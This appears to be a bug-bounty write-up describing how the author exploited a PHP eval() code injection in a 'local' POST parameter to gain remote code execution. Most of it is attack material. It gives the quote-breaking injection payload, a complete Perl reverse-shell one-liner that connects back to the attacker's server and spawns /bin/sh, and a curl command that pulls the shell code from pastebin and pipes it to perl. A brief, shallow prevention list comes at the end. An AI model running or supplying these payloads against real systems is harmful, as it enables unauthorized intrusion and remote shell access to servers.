RCE By Code Injection | Perl Reverse Shell
what is php code injection weakness ?
Code injection is an attack that delivers a malicious code payload through a vulnerable attack vector in eval() function without any sanitization or block dangerous functions like exec(), shell_exec(), system() or passthru()
Background story
While hunting on a private program I like to search on custom parameters in burpsuite after finishing test , like ssrf , lfi , xss parameters and custom by me , you can see this repo GF-Patterns to many parameters
I have found interested parameter name [ local ] in post request , I am trying to test ssrf and lfi but failed
Trying inject PHP code because subdomain uses PHP backend, so.. lets hack :)
Injected payload
print("AbdulrahmanKamel0xx")
Using [ ; ] to skip the previous function but failed [X]
;print("AbdulrahmanKamel0xx")
Using single qoute [‘] to close statement and [.] to concatenate => ‘..’
‘.print("AbdulrahmanKamel0xx").’
Injected Code Success ^_^
The expected backend code:
<?php
$input = $_REQUEST['local'];
eval('$input');
?>
If parameter value reflects inside double quotes will execute but inside single quotes cannot execute so we used single quote to close the statement and dot sign to concatenate
'.system("command").'
================================<?php
$input = $_REQUEST['local'];
eval(''.$input.'');
?>
Getting Reverse Shell
I am listening on 1234 port on vps and trying to get reverse shell ..
Trying by bash script and many other ways but failed [X] :(
Trying to check netcat or socat in server ? but not installed [X]
'.system("nc -v").'
Trying checks many languages like python , ruby and many of tools which can get reverse shell , not found but when check Perl language
we can get reverse shell by this code
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Failed operation because sign [&] means end the parameter and start new parameter like username=admin&password=pass
I am trying to encode this sign but not work ..
I am trying to check curl tool installed or no ? by this query
'.system("curl -v").'
It was found. good, lets bypass this operation
I am uploading Perl code on pastebin website after remove perl -e and [‘] quote ..
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
Using curl to access this code and execute by pipe signal
curl https://pastebin.com/raw/EEaH**** | perl
...
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
BOOM !! , it’s worked and get a reverse shell
Prevent PHP code injection
- Replace or Ban arguments with & ; && |
- Avoid using exec(), shell_exec(), system() or passthru()
- Avoid using strip_tags() for sanitisation
- Use a PHP security linter
- Utilise a SAST tool to identify code injection issues
- Do not trust any data from user